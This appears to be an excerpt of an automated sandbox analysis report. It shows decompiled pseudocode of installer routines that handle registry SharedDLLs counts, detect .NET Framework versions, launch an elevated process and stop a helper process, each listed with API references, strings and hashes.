				 *[fs:edx] = _t209;
				_v13 = 0;
				_t168 = E005C7A14(_t77, L"Software\\Microsoft\\Windows\\CurrentVersion\\SharedDLLs", 0x80000002,  &_v20, 3, 0);
				if(_t168 == 2) {
					L30:
					_pop(_t189);
					 *[fs:eax] = _t189;
					_push(E0060E7C5);
					E0040A228( &_v80, 2);
					E0040A228( &_v60, 2);
					E0040A228( &_v44, 2);
					return E0040A1C8( &_v8);
				} else {
					if(_t168 != 0) {
						E0060CF98(0x80000002,  &_v56, _t207);
						_v52 = _v56;
						_v48 = L"Software\\Microsoft\\Windows\\CurrentVersion\\SharedDLLs";
						E005CD4D8(0x52, 1,  &_v52,  &_v44);
						_push(_v44);
						_push(L"\r\n\r\n");
						_v72 = L"RegOpenKeyEx";
						E00423004(_t168,  &_v76);
						_v68 = _v76;
						E005C857C(_t168,  &_v80);
						_v64 = _v80;
						E005CD4D8(0x48, 2,  &_v72,  &_v60);
						_push(_v60);
						E0040B550( &_v40, _t168, 3, __edi, __esi);
						E00429008(_v40, 1);
						E004098C4();
					}
					_push(_t207);
					_push(0x60e77a);
					_push( *[fs:eax]);
					 *[fs:eax] = _t209;
					_t169 = E0040B278(_v12);
					if(RegQueryValueExW(_v20, _t169, 0,  &_v32, 0,  &_v36) == 0) {
						_v21 = 0;
						_v28 = 0;
						_push(_t207);
						_push(0x60e6b8);
						_push( *[fs:eax]);
						 *[fs:eax] = _t209;
						_t98 = _v32 - 1;
						__eflags = _t98;
						if(_t98 == 0) {
							__eflags = E005C793C();
							if(__eflags != 0) {
								_v28 = E0042339C(_v8, __eflags);
								_v21 = 1;
							}
						} else {
							_t133 = _t98 - 2;
							__eflags = _t133;
							if(_t133 == 0) {
								__eflags = _v36 - 1;
								if(_v36 >= 1) {
									__eflags = _v36 - 4;
									if(_v36 <= 4) {
										_t139 = RegQueryValueExW(_v20, E0040B278(_v12), 0, 0,  &_v28,  &_v36);
										__eflags = _t139;
										if(_t139 == 0) {
											_v21 = 1;
										}
									}
								}
							} else {
								__eflags = _t133 == 1;
								if(_t133 == 1) {
									_v36 = 4;
									_t144 = RegQueryValueExW(_v20, _t169, 0, 0,  &_v28,  &_v36);
									__eflags = _t144;
									if(_t144 == 0) {
										_v21 = 1;
									}
								}
							}
						}
						_pop(_t194);
						 *[fs:eax] = _t194;
						__eflags = _v21;
						if(_v21 != 0) {
							_v28 = _v28 - 1;
							__eflags = _v28;
							if(_v28 > 0) {
								_t103 = _v32 - 1;
								__eflags = _t103;
								if(_t103 == 0) {
									E0042302C( &_v8, _v28, 0);
									_t170 = _v8;
									__eflags = _t170;
									if(_t170 != 0) {
										_t172 = _t170 - 4;
										__eflags = _t172;
										_t170 =  *_t172;
									}
									_t110 = E0040B278(_v8);
									RegSetValueExW(_v20, E0040B278(_v12), 0, 1, _t110, _t170 + 1 + _t170 + 1);
								} else {
									__eflags = _t103 + 0xfffffffe - 2;
									if(_t103 + 0xfffffffe - 2 < 0) {
										RegSetValueExW(_v20, E0040B278(_v12), 0, _v32,  &_v28, 4);
									}
								}
							} else {
								_v13 = 1;
								RegDeleteValueW(_v20, E0040B278(_v12));
							}
							__eflags = 0;
							_pop(_t196);
							 *[fs:eax] = _t196;
							_push(E0060E781);
							return RegCloseKey(_v20);
						} else {
							E004099B8();
							goto L30;
						}
					} else {
						E004099B8();
						goto L30;
					}
				}
			}







































                                                                    0x0060e4d9
                                                                    0x0060e4db
                                                                    0x0060e4df
                                                                    0x0060e4e0
                                                                    0x0060e4e3
                                                                    0x0060e4e6
                                                                    0x0060e4e9
                                                                    0x0060e4ec
                                                                    0x0060e4ef
                                                                    0x0060e4f2
                                                                    0x0060e4f5
                                                                    0x0060e4f8
                                                                    0x0060e4fd
                                                                    0x0060e4fe
                                                                    0x0060e503
                                                                    0x0060e506
                                                                    0x0060e509
                                                                    0x0060e524
                                                                    0x0060e529
                                                                    0x0060e781
                                                                    0x0060e783
                                                                    0x0060e786
                                                                    0x0060e789
                                                                    0x0060e796
                                                                    0x0060e7a3
                                                                    0x0060e7b0
                                                                    0x0060e7bd
                                                                    0x0060e52f
                                                                    0x0060e531
                                                                    0x0060e543
                                                                    0x0060e54b
                                                                    0x0060e553
                                                                    0x0060e562
                                                                    0x0060e567
                                                                    0x0060e56a
                                                                    0x0060e578
                                                                    0x0060e580
                                                                    0x0060e588
                                                                    0x0060e590
                                                                    0x0060e598
                                                                    0x0060e5a7
                                                                    0x0060e5ac
                                                                    0x0060e5b7
                                                                    0x0060e5c6
                                                                    0x0060e5cb
                                                                    0x0060e5cb
                                                                    0x0060e5d2
                                                                    0x0060e5d3
                                                                    0x0060e5d8
                                                                    0x0060e5db
                                                                    0x0060e5f2
                                                                    0x0060e600
                                                                    0x0060e60c
                                                                    0x0060e612
                                                                    0x0060e617
                                                                    0x0060e618
                                                                    0x0060e61d
                                                                    0x0060e620
                                                                    0x0060e626
                                                                    0x0060e626
                                                                    0x0060e627
                                                                    0x0060e640
                                                                    0x0060e642
                                                                    0x0060e64c
                                                                    0x0060e64f
                                                                    0x0060e64f
                                                                    0x0060e629
                                                                    0x0060e629
                                                                    0x0060e629
                                                                    0x0060e62c
                                                                    0x0060e655
                                                                    0x0060e659
                                                                    0x0060e65b
                                                                    0x0060e65f
                                                                    0x0060e67a
                                                                    0x0060e67f
                                                                    0x0060e681
                                                                    0x0060e683
                                                                    0x0060e683
                                                                    0x0060e681
                                                                    0x0060e65f
                                                                    0x0060e62e
                                                                    0x0060e62e
                                                                    0x0060e62f
                                                                    0x0060e689
                                                                    0x0060e6a1
                                                                    0x0060e6a6
                                                                    0x0060e6a8
                                                                    0x0060e6aa
                                                                    0x0060e6aa
                                                                    0x0060e6a8
                                                                    0x0060e62f
                                                                    0x0060e62c
                                                                    0x0060e6b0
                                                                    0x0060e6b3
                                                                    0x0060e6c2
                                                                    0x0060e6c6
                                                                    0x0060e6d2
                                                                    0x0060e6d5
                                                                    0x0060e6d9
                                                                    0x0060e6f6
                                                                    0x0060e6f6
                                                                    0x0060e6f7
                                                                    0x0060e70d
                                                                    0x0060e712
                                                                    0x0060e715
                                                                    0x0060e717
                                                                    0x0060e719
                                                                    0x0060e719
                                                                    0x0060e71c
                                                                    0x0060e71c
                                                                    0x0060e727
                                                                    0x0060e73e
                                                                    0x0060e6f9
                                                                    0x0060e6fc
                                                                    0x0060e6ff
                                                                    0x0060e75e
                                                                    0x0060e75e
                                                                    0x0060e6ff
                                                                    0x0060e6db
                                                                    0x0060e6db
                                                                    0x0060e6ec
                                                                    0x0060e6ec
                                                                    0x0060e763
                                                                    0x0060e765
                                                                    0x0060e768
                                                                    0x0060e76b
                                                                    0x0060e779
                                                                    0x0060e6c8
                                                                    0x0060e6c8
                                                                    0x00000000
                                                                    0x0060e6c8
                                                                    0x0060e602
                                                                    0x0060e602
                                                                    0x00000000
                                                                    0x0060e602
                                                                    0x0060e600

                                                                    APIs
                                                                      • Part of subcall function 005C7A14: RegOpenKeyExW.ADVAPI32(80000001,Control Panel\Desktop\ResourceLocale,00000000,005C80EE,?,00000000,?,005C808E,00000001,00000001,00000000,00000000,kernel32.dll,GetUserDefaultUILanguage,00000000,005C80EE), ref: 005C7A30
                                                                    • RegQueryValueExW.ADVAPI32(?,00000000,00000000,?,00000000,?,00000000,0060E77A,?,?,00000003,00000000,00000000,0060E7BE), ref: 0060E5F9
                                                                      • Part of subcall function 005C857C: FormatMessageW.KERNEL32(00003200,00000000,00000000,00000000,?,00000400,00000000,00000000,005CBEAE,00000000,005CBEFF,?,005CC0E0), ref: 005C859B
                                                                    • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,00000004,00000000,0060E6B8,?,?,00000000,00000000,?,00000000,?,00000000), ref: 0060E67A
                                                                    • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,00000004,00000000,0060E6B8,?,?,00000000,00000000,?,00000000,?,00000000), ref: 0060E6A1
                                                                    Strings
                                                                    • , xrefs: 0060E56A
                                                                    • Software\Microsoft\Windows\CurrentVersion\SharedDLLs, xrefs: 0060E54E
                                                                    • Software\Microsoft\Windows\CurrentVersion\SharedDLLs, xrefs: 0060E515
                                                                    • RegOpenKeyEx, xrefs: 0060E573
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.334080085.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000E.00000002.334059347.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335728201.00000000006C5000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335745535.00000000006CA000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335757489.00000000006CC000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335770966.00000000006CE000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335778403.00000000006CF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335786260.00000000006D4000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335795571.00000000006D9000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335802546.00000000006DB000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335808234.00000000006DC000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335816126.00000000006DE000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: QueryValue$FormatMessageOpen
                                                                    • String ID: $RegOpenKeyEx$Software\Microsoft\Windows\CurrentVersion\SharedDLLs$Software\Microsoft\Windows\CurrentVersion\SharedDLLs
                                                                    • API String ID: 2812809588-1577016196
                                                                    • Opcode ID: c935babc025dfde1231f0ed7150034372abcde662798295f1ed62f2a300e3225
                                                                    • Instruction ID: f3c5cbb3acae1969306396449b745ae43344fa58bfe099d55e14c7ecbf00227c
                                                                    • Opcode Fuzzy Hash: c935babc025dfde1231f0ed7150034372abcde662798295f1ed62f2a300e3225
                                                                    • Instruction Fuzzy Hash: C7919270E84219AFDB04DFA5D885BEFBBBAEB48304F14482AF500E72C1D7769945CB64
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0062709C, Relevance: 19.4, APIs: 3, Strings: 8, Instructions: 162registryCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 84%
                                                                    			E0062709C(signed int __eax, void* __ebx, signed int __edx, void* __edi, void* __esi) {
				signed int _v5;
				char _v8;
				void* _v12;
				char _v16;
				char _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				char _v40;
				void* __ecx;
				void* _t79;
				signed int _t83;
				signed char _t125;
				intOrPtr _t127;
				intOrPtr _t156;
				signed int _t170;
				intOrPtr _t178;
				intOrPtr _t180;
				intOrPtr _t181;

				_t180 = _t181;
				_t127 = 4;
				do {
					_push(0);
					_push(0);
					_t127 = _t127 - 1;
				} while (_t127 != 0);
				_t1 =  &_v8;
				_t128 =  *_t1;
				 *_t1 = _t127;
				_t178 =  *_t1;
				_v5 = __edx;
				_t125 = __eax;
				_push(_t180);
				_push(0x6272a5);
				_push( *[fs:eax]);
				 *[fs:eax] = _t181;
				if( *((intOrPtr*)(0x6d6380 + ((__eax & 0x000000ff) + (__eax & 0x000000ff)) * 8 + (_v5 & 0x000000ff) * 4)) != 0) {
					L18:
					E0040A5A8(_t178,  *((intOrPtr*)(0x6d6380 + ((_t125 & 0x000000ff) + (_t125 & 0x000000ff)) * 8 + (_v5 & 0x000000ff) * 4)));
					_pop(_t156);
					 *[fs:eax] = _t156;
					_push(E006272AC);
					return E0040A228( &_v32, 5);
				}
				E00626F48(__eax, _t128,  &_v16, _t180);
				if((_v5 & 0x000000ff) + 0xfe - 2 >= 0 || E005C7A14(_t125, L"SOFTWARE\\Microsoft\\.NETFramework\\Policy\\v4.0", 0x80000002,  &_v12, 1, 0) != 0) {
					_t79 = (_v5 & 0x000000ff) - 1;
					if(_t79 == 0 || _t79 == 2) {
						if(E005C7A14(_t125, L"SOFTWARE\\Microsoft\\.NETFramework\\Policy\\v2.0", 0x80000002,  &_v12, 1, 0) != 0) {
							goto L10;
						} else {
							_t174 = _t125 & 0x0000007f;
							E005C4EA4( *((intOrPtr*)(0x6d6374 + (_t125 & 0x0000007f) * 4)),  &_v24);
							E0040B4C8(0x6d6380 + (_t174 + _t174) * 8 + (_v5 & 0x000000ff) * 4, L"v2.0.50727", _v24);
							RegCloseKey(_v12);
							goto L14;
						}
					} else {
						L10:
						_t83 = _v5 & 0x000000ff;
						if(_t83 == 0 || _t83 == 3) {
							if(E005C7A14(_t125, L"SOFTWARE\\Microsoft\\.NETFramework\\Policy\\v1.1", 0x80000002,  &_v12, 1, 0) == 0) {
								_t172 = _t125 & 0x0000007f;
								E005C4EA4( *((intOrPtr*)(0x6d6374 + (_t125 & 0x0000007f) * 4)),  &_v28);
								E0040B4C8(0x6d6380 + (_t172 + _t172) * 8 + (_v5 & 0x000000ff) * 4, L"v1.1.4322", _v28);
								RegCloseKey(_v12);
							}
						}
						goto L14;
					}
				} else {
					_t176 = _t125 & 0x0000007f;
					E005C4EA4( *((intOrPtr*)(0x6d6374 + (_t125 & 0x0000007f) * 4)),  &_v20);
					E0040B4C8(0x6d6380 + (_t176 + _t176) * 8 + (_v5 & 0x000000ff) * 4, L"v4.0.30319", _v20);
					RegCloseKey(_v12);
					L14:
					_t170 = _v5 & 0x000000ff;
					if( *((intOrPtr*)(0x6d6380 + ((_t125 & 0x000000ff) + (_t125 & 0x000000ff)) * 8 + _t170 * 4)) == 0) {
						if(_v5 == 3) {
							E0060CD28(L".NET Framework not found", _t125);
						} else {
							_v40 =  *((intOrPtr*)(0x6cd0a4 + _t170 * 4));
							_v36 = 0x11;
							E004244F8(L".NET Framework version %s not found", 0,  &_v40,  &_v32);
							E0060CD28(_v32, _t125);
						}
					}
					goto L18;
				}
			}























                                                                    0x0062709d
                                                                    0x006270a0
                                                                    0x006270a5
                                                                    0x006270a5
                                                                    0x006270a7
                                                                    0x006270a9
                                                                    0x006270a9
                                                                    0x006270ac
                                                                    0x006270ac
                                                                    0x006270ac
                                                                    0x006270b2
                                                                    0x006270b4
                                                                    0x006270b7
                                                                    0x006270bb
                                                                    0x006270bc
                                                                    0x006270c1
                                                                    0x006270c4
                                                                    0x006270db
                                                                    0x00627270
                                                                    0x00627285
                                                                    0x0062728c
                                                                    0x0062728f
                                                                    0x00627292
                                                                    0x006272a4
                                                                    0x006272a4
                                                                    0x006270e6
                                                                    0x006270f3
                                                                    0x00627157
                                                                    0x00627159
                                                                    0x0062717a
                                                                    0x00000000
                                                                    0x0062717c
                                                                    0x00627181
                                                                    0x0062718b
                                                                    0x006271aa
                                                                    0x006271b3
                                                                    0x00000000
                                                                    0x006271b3
                                                                    0x006271ba
                                                                    0x006271ba
                                                                    0x006271ba
                                                                    0x006271c0
                                                                    0x006271e1
                                                                    0x006271e8
                                                                    0x006271f2
                                                                    0x00627211
                                                                    0x0062721a
                                                                    0x0062721a
                                                                    0x006271e1
                                                                    0x00000000
                                                                    0x006271c0
                                                                    0x00627112
                                                                    0x00627117
                                                                    0x00627121
                                                                    0x00627140
                                                                    0x00627149
                                                                    0x0062721f
                                                                    0x0062721f
                                                                    0x00627233
                                                                    0x00627239
                                                                    0x0062726b
                                                                    0x0062723b
                                                                    0x00627246
                                                                    0x00627249
                                                                    0x00627257
                                                                    0x0062725f
                                                                    0x0062725f
                                                                    0x00627239
                                                                    0x00000000
                                                                    0x00627233

                                                                    APIs
                                                                    • RegCloseKey.ADVAPI32(?,?,00000001,00000000,00000000,006272A5,?,00626DA0,?,00000000,00000000,00000000,?,?,00627510,00000000), ref: 00627149
                                                                    • RegCloseKey.ADVAPI32(?,?,00000001,00000000,00000000,006272A5,?,00626DA0,?,00000000,00000000,00000000,?,?,00627510,00000000), ref: 006271B3
                                                                    • RegCloseKey.ADVAPI32(?,?,00000001,00000000,?,00000001,00000000,00000000,006272A5,?,00626DA0,?,00000000,00000000,00000000,?), ref: 0062721A
                                                                    Strings
                                                                    • .NET Framework not found, xrefs: 00627266
                                                                    • SOFTWARE\Microsoft\.NETFramework\Policy\v2.0, xrefs: 00627169
                                                                    • v2.0.50727, xrefs: 006271A5
                                                                    • SOFTWARE\Microsoft\.NETFramework\Policy\v1.1, xrefs: 006271D0
                                                                    • .NET Framework version %s not found, xrefs: 00627252
                                                                    • v1.1.4322, xrefs: 0062720C
                                                                    • SOFTWARE\Microsoft\.NETFramework\Policy\v4.0, xrefs: 006270FF
                                                                    • v4.0.30319, xrefs: 0062713B
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.334080085.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000E.00000002.334059347.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335728201.00000000006C5000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335745535.00000000006CA000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335757489.00000000006CC000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335770966.00000000006CE000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335778403.00000000006CF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335786260.00000000006D4000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335795571.00000000006D9000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335802546.00000000006DB000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335808234.00000000006DC000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335816126.00000000006DE000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: Close
                                                                    • String ID: .NET Framework not found$.NET Framework version %s not found$SOFTWARE\Microsoft\.NETFramework\Policy\v1.1$SOFTWARE\Microsoft\.NETFramework\Policy\v2.0$SOFTWARE\Microsoft\.NETFramework\Policy\v4.0$v1.1.4322$v2.0.50727$v4.0.30319
                                                                    • API String ID: 3535843008-446240816
                                                                    • Opcode ID: e0941211630b040962ad433e1c7d93649d8e46d21326bdffa5a487f6456e7331
                                                                    • Instruction ID: 6a27bfdae97b75501bbdc0cce0dcd9b9ee0f65bcede85a7be403583e7914197f
                                                                    • Opcode Fuzzy Hash: e0941211630b040962ad433e1c7d93649d8e46d21326bdffa5a487f6456e7331
                                                                    • Instruction Fuzzy Hash: 8551E131A091699FCF04DBA8E861FFD7BB7EF45300F1504AAF500A7392D639AB058B21
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 006A60E8, Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 93COMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 79%
                                                                    			E006A60E8(void* __eax, void* __ebx, DWORD* __ecx, void* __edx, void* __esi, void* __eflags, void* __fp0) {
				char _v8;
				char _v12;
				DWORD* _v16;
				struct _SHELLEXECUTEINFOW _v76;
				long _t41;
				intOrPtr _t69;
				void* _t71;
				void* _t73;
				void* _t74;
				intOrPtr _t75;

				_t73 = _t74;
				_t75 = _t74 + 0xffffffb8;
				_v8 = 0;
				_v12 = 0;
				_v16 = __ecx;
				_t71 = __edx;
				_t60 = __eax;
				_push(_t73);
				_push(0x6a6237);
				 *[fs:eax] = _t75;
				E006A5F04(__eax,  &_v8,  *[fs:eax]);
				E006A6014( &_v12, _t60, _t71);
				E00407760( &_v76, 0x3c);
				_v76.cbSize = 0x3c;
				_v76.fMask = 0x800540;
				_v76.lpVerb = L"runas";
				_v76.lpFile = E0040B278(_v8);
				_v76.lpParameters = E0040B278(_t71);
				_v76.lpDirectory = E0040B278(_v12);
				_v76.nShow = 1;
				if(ShellExecuteExW( &_v76) == 0) {
					if(GetLastError() == 0x4c7) {
						E00428FDC();
					}
					E0060CE84(L"ShellExecuteEx");
				}
				if(_v76.hProcess == 0) {
					E0060CD28(L"ShellExecuteEx returned hProcess=0", _t60);
				}
				_push(_t73);
				_push(0x6a6215);
				_push( *[fs:edx]);
				 *[fs:edx] = _t75;
				do {
					E006A5C10();
					_t41 = MsgWaitForMultipleObjects(1,  &(_v76.hProcess), 0, 0xffffffff, 0x4ff);
				} while (_t41 == 1);
				if(_t41 == 0xffffffff) {
					E0060CE84(L"MsgWaitForMultipleObjects");
				}
				E006A5C10();
				if(GetExitCodeProcess(_v76.hProcess, _v16) == 0) {
					E0060CE84(L"GetExitCodeProcess");
				}
				_pop(_t69);
				 *[fs:eax] = _t69;
				_push(E006A621C);
				return CloseHandle(_v76.hProcess);
			}













                                                                    0x006a60e9
                                                                    0x006a60eb
                                                                    0x006a60f2
                                                                    0x006a60f5
                                                                    0x006a60f8
                                                                    0x006a60fb
                                                                    0x006a60fd
                                                                    0x006a6101
                                                                    0x006a6102
                                                                    0x006a610a
                                                                    0x006a6112
                                                                    0x006a611a
                                                                    0x006a6129
                                                                    0x006a612e
                                                                    0x006a6135
                                                                    0x006a6141
                                                                    0x006a614c
                                                                    0x006a6156
                                                                    0x006a6161
                                                                    0x006a6164
                                                                    0x006a6176
                                                                    0x006a6182
                                                                    0x006a6184
                                                                    0x006a6184
                                                                    0x006a618e
                                                                    0x006a618e
                                                                    0x006a6197
                                                                    0x006a619e
                                                                    0x006a619e
                                                                    0x006a61a5
                                                                    0x006a61a6
                                                                    0x006a61ab
                                                                    0x006a61ae
                                                                    0x006a61b1
                                                                    0x006a61b1
                                                                    0x006a61c5
                                                                    0x006a61ca
                                                                    0x006a61d2
                                                                    0x006a61d9
                                                                    0x006a61d9
                                                                    0x006a61de
                                                                    0x006a61f2
                                                                    0x006a61f9
                                                                    0x006a61f9
                                                                    0x006a6200
                                                                    0x006a6203
                                                                    0x006a6206
                                                                    0x006a6214

                                                                    APIs
                                                                      • Part of subcall function 006A5F04: GetModuleHandleW.KERNEL32(kernel32.dll,GetFinalPathNameByHandleW), ref: 006A5F30
                                                                      • Part of subcall function 006A5F04: GetFileAttributesW.KERNEL32(00000000,00000000,kernel32.dll,GetFinalPathNameByHandleW), ref: 006A5F49
                                                                      • Part of subcall function 006A5F04: CreateFileW.KERNEL32(00000000,00000000,00000007,00000000,00000003,00000000,00000000,00000000,00000000,kernel32.dll,GetFinalPathNameByHandleW), ref: 006A5F73
                                                                      • Part of subcall function 006A5F04: CloseHandle.KERNEL32(00000000), ref: 006A5F91
                                                                      • Part of subcall function 006A6014: GetCurrentDirectoryW.KERNEL32(00000104,?,00000000,006A60A5,?,00000097,00000000,?,006A611F,00000000,006A6237,?,?,00000001), ref: 006A6043
                                                                    • ShellExecuteExW.SHELL32(0000003C), ref: 006A616F
                                                                    • GetLastError.KERNEL32(0000003C,00000000,006A6237,?,?,00000001), ref: 006A6178
                                                                    • MsgWaitForMultipleObjects.USER32 ref: 006A61C5
                                                                    • GetExitCodeProcess.KERNEL32 ref: 006A61EB
                                                                    • CloseHandle.KERNEL32(00000000,006A621C,00000000,00000000,000000FF,000004FF,00000000,006A6215,?,0000003C,00000000,006A6237,?,?,00000001), ref: 006A620F
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.334080085.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000E.00000002.334059347.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335728201.00000000006C5000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335745535.00000000006CA000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335757489.00000000006CC000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335770966.00000000006CE000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335778403.00000000006CF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335786260.00000000006D4000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335795571.00000000006D9000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335802546.00000000006DB000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335808234.00000000006DC000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335816126.00000000006DE000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: Handle$CloseFile$AttributesCodeCreateCurrentDirectoryErrorExecuteExitLastModuleMultipleObjectsProcessShellWait
                                                                    • String ID: <$GetExitCodeProcess$MsgWaitForMultipleObjects$ShellExecuteEx$ShellExecuteEx returned hProcess=0$runas
                                                                    • API String ID: 254331816-221126205
                                                                    • Opcode ID: 4b01546bb7c1e1f880d0074e3a62ab49537264529600a4ba05fbe354f8589c55
                                                                    • Instruction ID: 3b593d6e4f6188ec2893085c4d8bc70e2010c955c7988aee54b7ca20d83eebf0
                                                                    • Opcode Fuzzy Hash: 4b01546bb7c1e1f880d0074e3a62ab49537264529600a4ba05fbe354f8589c55
                                                                    • Instruction Fuzzy Hash: 4931AF70A00208AFDB10FFE9C842A9DBABAEF06314F44053DF514E62D2D7789E448F29
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00625D14, Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 70sleepsynchronizationCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 100%
                                                                    			E00625D14(intOrPtr __eax, void* __edx) {
				long _v12;
				long _v16;
				void* __ebx;
				void* __esi;
				void* _t44;
				void* _t50;
				intOrPtr _t51;
				DWORD* _t52;

				_t19 = __eax;
				_t52 =  &_v12;
				_t44 = __edx;
				_t51 = __eax;
				if( *((char*)(__eax + 4)) == 0) {
					L11:
					return _t19;
				}
				 *((char*)(__eax + 5)) = 1;
				_v16 =  *((intOrPtr*)(__eax + 0x10));
				_v12 = 0;
				E006163B4(L"Stopping 64-bit helper process. (PID: %u)", __edx, 0,  &_v16, _t50, __eax);
				CloseHandle( *(_t51 + 0xc));
				 *(_t51 + 0xc) = 0;
				while(WaitForSingleObject( *(_t51 + 8), 0x2710) == 0x102) {
					E00616130(L"Helper isn\'t responding; killing it.", _t44, _t50, _t51);
					TerminateProcess( *(_t51 + 8), 1);
				}
				if(GetExitCodeProcess( *(_t51 + 8), _t52) == 0) {
					E00616130(L"Helper process exited, but failed to get exit code.", _t44, _t50, _t51);
				} else {
					if( *_t52 != 0) {
						_v16 =  *_t52;
						_v12 = 0;
						E006163B4(L"Helper process exited with failure code: 0x%x", _t44, 0,  &_v16, _t50, _t51);
					} else {
						E00616130(L"Helper process exited.", _t44, _t50, _t51);
					}
				}
				CloseHandle( *(_t51 + 8));
				 *(_t51 + 8) = 0;
				_t19 = 0;
				 *((intOrPtr*)(_t51 + 0x10)) = 0;
				 *((char*)(_t51 + 4)) = 0;
				if(_t44 == 0) {
					goto L11;
				} else {
					Sleep(0xfa);
					return 0;
				}
			}











                                                                    0x00625d14
                                                                    0x00625d16
                                                                    0x00625d19
                                                                    0x00625d1b
                                                                    0x00625d21
                                                                    0x00625df3
                                                                    0x00625df3
                                                                    0x00625df3
                                                                    0x00625d27
                                                                    0x00625d2e
                                                                    0x00625d32
                                                                    0x00625d42
                                                                    0x00625d4b
                                                                    0x00625d52
                                                                    0x00625d6c
                                                                    0x00625d5c
                                                                    0x00625d67
                                                                    0x00625d67
                                                                    0x00625d8d
                                                                    0x00625dc4
                                                                    0x00625d8f
                                                                    0x00625d93
                                                                    0x00625da4
                                                                    0x00625da8
                                                                    0x00625db8
                                                                    0x00625d95
                                                                    0x00625d9a
                                                                    0x00625d9a
                                                                    0x00625d93
                                                                    0x00625dcd
                                                                    0x00625dd4
                                                                    0x00625dd7
                                                                    0x00625dd9
                                                                    0x00625ddc
                                                                    0x00625de2
                                                                    0x00000000
                                                                    0x00625de4
                                                                    0x00625de9
                                                                    0x00000000
                                                                    0x00625de9

                                                                    APIs
                                                                    • CloseHandle.KERNEL32(?), ref: 00625D4B
                                                                    • TerminateProcess.KERNEL32(?,00000001,?,00002710,?), ref: 00625D67
                                                                    • WaitForSingleObject.KERNEL32(?,00002710,?), ref: 00625D75
                                                                    • GetExitCodeProcess.KERNEL32 ref: 00625D86
                                                                    • CloseHandle.KERNEL32(?,?,?,?,00002710,?,00000001,?,00002710,?), ref: 00625DCD
                                                                    • Sleep.KERNEL32(000000FA,?,?,?,?,00002710,?,00000001,?,00002710,?), ref: 00625DE9
                                                                    Strings
                                                                    • Helper process exited with failure code: 0x%x, xrefs: 00625DB3
                                                                    • Helper process exited., xrefs: 00625D95
                                                                    • Stopping 64-bit helper process. (PID: %u), xrefs: 00625D3D
                                                                    • Helper process exited, but failed to get exit code., xrefs: 00625DBF
                                                                    • Helper isn't responding; killing it., xrefs: 00625D57
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.334080085.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000E.00000002.334059347.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335728201.00000000006C5000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335745535.00000000006CA000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335757489.00000000006CC000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335770966.00000000006CE000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335778403.00000000006CF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335786260.00000000006D4000.00000004.00020000.sdmp Download File
